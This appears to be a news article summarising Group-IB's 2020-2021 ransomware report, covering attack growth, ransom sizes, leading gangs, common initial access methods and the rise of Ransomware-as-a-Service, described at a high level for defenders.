2020 was a difficult year for most people around the globe. It brought upon unprecedented hardships and the situation became worse than just hand-to-mouth. However, there was a set of individuals who were having the time of their life, the ransomware masterminds. While industries and businesses struggled to adapt to a post-pandemic reality, threat actors thrived, attacking bigger targets, and demanding more money. The year 2020 saw the growth of Ransomware-as-a-Service (RaaS) programs, which exceedingly became popular on underground forums. The data exfiltration tactic employed by the operators gave them added assurance of returns and thus it became a popular choice among their peers. However, to stand a chance against threat actors in 2021, it is vital to not only understand their TTPs, but also understand what actions need to be taken against them. Focusing more on these lines Group-IB, a cybersecurity firm, has released a report titled “Ransomware Uncovered 2020-2021.”
The Growth of Ransomware Report
The report dives deep into the global ransomware outbreak in 2020 and analyzes major players’ TTPs (tactics, techniques, and procedures). By the end of 2020, the ransomware market, fueled by the pandemic turbulence, had turned into the biggest cybercrime money-making business. Based on the analysis of more than 500 attacks observed researchers estimate that the number of ransomware attacks grew by more than 150% in 2020.
In 2020, ransomware attacks on average caused 18 days of downtime for the affected companies, while the average ransom amount increased by twofold and amounted to $170,000. Ransomware operations have now become robust and competitive business structures going after larger enterprises and companies for better returns. Talking about the most active ransomware gangs, researchers found that Maze, Conti, and Egregor ransomware gangs were at the forefront of it in the past year. Of these, Maze, DoppelPaymer, and RagnarLocker were termed as the greediest groups, as their ransom demands averaged between $1 million and $2 million.
Analyzing the geo-targets of the ransomware gangs, researchers spotted that the most attacked regions in the world were North America, Europe, Latin America, and the Asia-Pacific.
On a technical level, public-facing RDP servers were the most common target for many ransomware gangs last year. The pandemic caused many people to work from home and thus the number of such servers grew exponentially. In 52% of all attacks analyzed by Group-IB researchers, publicly accessible RDP servers were used to gain initial access. This tactic was closely followed by phishing (29%), and exploitation of public-facing applications (17%). In the credential access stage, threat actors often used brute force with NLBrute and Hydra being the most popular tools. To obtain valid privileges, ransomware operators in 2020 often used credential dumping – retrieving all the passwords from the attacked machine.
Besides, PowerShell was the most frequently abused interpreter for launching the initial payload. Its popularity among the attackers is explained by the fact that the interpreter is part of every Windows-based system, hence it is easier to disguise malicious activity.
The Rise of RaaS
The Ransomware-as-a-Service (RaaS) model has largely been the driving force behind the sensational growth of ransomware attacks. This modus operandi involves the developers selling/leasing malware to the program affiliates for further network compromise and ransomware deployment. The profits are then shared between the operators and program affiliates. Owing to this backdrop, Group-IB researchers observed that 64% of all the ransomware attacks it analyzed in 2020 came from operators using the RaaS model.
Oleg Skulkin, Senior Digital Forensics Analyst at Group-IB, said, “The pandemic has catapulted ransomware into the threat landscape of every organization and has made it the face of cybercrime in 2020. From what used to be a rare practice and an end-user concern, ransomware has evolved last year into an organized multi-billion industry with competition within, market leaders, strategic alliances, and various business models. This successful venture is only going to get bigger from here. Due to their profitability, the number of RaaS programs will keep growing, more cybercriminals will focus on gaining access to networks for resale purposes.
Given that most attacks are human operated it is paramount for organizations to understand how attackers operate, what tools they use to be able to counter ransomware operators’ attacks and hunt for them proactively. It is everyone’s concern now.”